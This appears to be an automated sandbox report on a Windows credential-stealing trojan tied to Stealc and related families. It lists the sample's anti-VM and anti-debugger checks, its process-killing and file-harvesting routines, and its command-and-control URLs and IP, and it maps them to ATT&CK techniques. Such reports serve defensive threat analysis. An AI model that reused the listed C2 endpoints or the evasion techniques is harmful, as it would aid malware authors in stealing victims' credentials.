Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 67FB89 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 67FC81 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 8C1EB0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision | graph_1-27136
Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes | graph_1-25954
Source: C:\Users\user\Desktop\file.exe | API coverage: 4.8 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_004418A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 1_2_004418A0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00443910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 1_2_00443910
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00441250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 1_2_00441250
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00441269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 1_2_00441269
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0044E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 1_2_0044E210
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00444B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 1_2_00444B10
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00444B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 1_2_00444B29
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0044CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 1_2_0044CBE0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0043DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 1_2_0043DB80
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00442390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA | 1_2_00442390
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0043DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 1_2_0043DB99
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_004423A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 1_2_004423A9
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0044D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose | 1_2_0044D530
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0044DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy | 1_2_0044DD30
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_004316A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 1_2_004316A0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_004316B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 1_2_004316B9
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00451BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess | 1_2_00451BF0
Source: file.exe, file.exe, 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000001.00000002.2252021419.0000000001053000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW.
Source: file.exe, 00000001.00000002.2252021419.0000000001053000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000001.00000002.2252021419.0000000001024000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH
Source: file.exe, 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_1-25793
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_1-25948
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_1-25940
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_1-25813
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00434A60 VirtualProtect 00000000,00000004,00000100,? | 1_2_00434A60
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00456390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 1_2_00456390
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00456390 mov eax, dword ptr fs:[00000030h] | 1_2_00456390
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00452A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 1_2_00452A40
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 2664, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00454610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle | 1_2_00454610
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_004546A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle | 1_2_004546A0
Source: file.exe, file.exe, 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: YProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 1_2_00452D60
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00452B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA | 1_2_00452B60
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00452A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 1_2_00452A40
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00452C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 1_2_00452C10

              Stealing of Sensitive Information

Source: Yara match | File source: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.2210616498.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 2664, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match | File source: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.2210616498.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 2664, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

MITRE ATT&CK Matrix (techniques listed per tactic; a number in parentheses is the count shown against that technique)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Command and Scripting Interpreter (2), Native API (13), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: Create Account (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Antivirus detection, initial sample (Source | Detection | Scanner | Label):
• file.exe | 51% | Virustotal | -
• file.exe | 100% | Avira | TR/Crypt.TPM.Gen
• file.exe | 100% | Joe Sandbox ML | -
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Antivirus detection, URLs (Source | Detection | Scanner | Label):
• http://185.215.113.206//oY= | 100% | Avira URL Cloud | malware
• http://185.215.113.206% | 0% | Avira URL Cloud | safe
• http://185.215.113.206/ToN= | 100% | Avira URL Cloud | malware
              No contacted domains info
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
• http://185.215.113.206/c4becf79229cb002.php | false | - | high
• http://185.215.113.206/ | false | - | high
URLs found in memory or binary data (Name | Source | Malicious | Antivirus Detection | Reputation):
• http://185.215.113.206//oY= | file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
• http://185.215.113.206/ToN= | file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
• http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmp | false | - | high
• http://185.215.113.206 | file.exe, 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
• http://185.215.113.206/ws | file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmp | false | - | high
• http://185.215.113.206% | file.exe, 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
• http://185.215.113.206/c4becf79229cb002.phph | file.exe, 00000001.00000002.2252021419.0000000001053000.00000004.00000020.00020000.00000000.sdmp | false | - | high
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
• 185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561690
Start date and time: 2024-11-24 05:10:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 18
• Number of non-executed functions: 125
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56
• Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
• Report size getting too big, too many NtQueryValueKey calls found.
                          No simulations
Context for contacted IP 185.215.113.206, other samples previously seen contacting it (Associated Sample Name | Detection | Threat Name | Context):
• file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
• file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
• file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
• file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
• file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
• file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
• file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
• file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
• 2fQ8fpTWAP.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
• file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
No context
Context for ASN WHOLESALECONNECTIONSNL, other samples previously seen contacting this ASN (Associated Sample Name | Detection | Threat Name | Context IP):
• file.exe | malicious | Amadey | 185.215.113.43
• file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
• file.exe | malicious | LummaC Stealer | 185.215.113.16
• file.exe | malicious | Stealc | 185.215.113.206
• file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206
• file.exe | malicious | Amadey | 185.215.113.43
• file.exe | malicious | LummaC Stealer | 185.215.113.16
• file.exe | malicious | LummaC Stealer | 185.215.113.16
• file.exe | malicious | Stealc | 185.215.113.206
• file.exe | malicious | Amadey | 185.215.113.43
                          No context
                          No context
                          No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.946913420590235
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'827'840 bytes
MD5: 358f03c97356f147bacbfe66db998b47
SHA1: 86778c0cabcb58f05672a91feb182eecef95e8b8
SHA256: 292c01862fad9dc3ab9a0348756832a5f44273ea50b23088f77fa0e5acaec7d4
SHA512: 009fdc3b08fce89273bfcbad825512d875958c44982077f6fc2b6c5b49ea80bbae75deb01464f1917c2f470a13273f82e26826df9ef3db9c466096a1833beb21
SSDEEP: 24576:mivxjNxlibrzROZjXt9BUmG9TVtCXLYQ5jqpcEmG3F5hiM9kfM7OKr06ppzF1VQE:hvdNxlibBkdUmGm0c81SfM7OAGj6H/
TLSH: 098533391D4325B6CCB48B70ACDFA293BDE55E31751C861B2E2726FB8AC648578CC0D9
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
Icon Hash: 00928e8e8686b000
Entrypoint: 0xaaa000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
